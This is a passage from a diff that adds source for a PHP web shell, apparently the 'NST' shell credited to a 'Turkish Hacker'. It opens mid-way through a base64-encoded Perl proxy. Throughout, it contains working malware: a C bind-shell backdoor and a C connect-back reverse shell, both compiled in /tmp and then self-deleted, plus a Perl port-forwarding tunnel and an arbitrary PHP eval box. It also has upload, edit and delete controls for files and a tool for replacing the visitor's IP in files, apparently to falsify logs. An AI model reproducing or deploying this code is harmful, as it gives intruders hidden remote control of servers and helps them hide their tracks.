gfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg=="; 
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("nohup /tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru("nohup .nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("nohup /tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# EEdited By KingDefacer (Turkish Hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"Íåëüçÿ îòêğûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
+
+print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"Ïğåğâàíî âûïîëåíèå accept: \$!\n\";
+                next;
+        }
+
+        printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## Íîâûé ïğîöåññ
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ïğîøåë óñïåøíî, çàêğûâàåì ñîêåò.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: Äåëàåì ğåäèğåêò íà \$o->{'tohost'}, ïîğò \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: Ïğåğâàí ğåäèğåêò íà %s, ïîğò %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: Ïğåğâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: Âêëş÷àåì öèêë.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: Îøèáêà Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Îøèáêà ïğè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: Æäåì äàííûõ.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: Ïğîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://alturks.com/?q=releases&download=4>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$thisX=$_POST['thisX'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$thisX","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$thisX Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
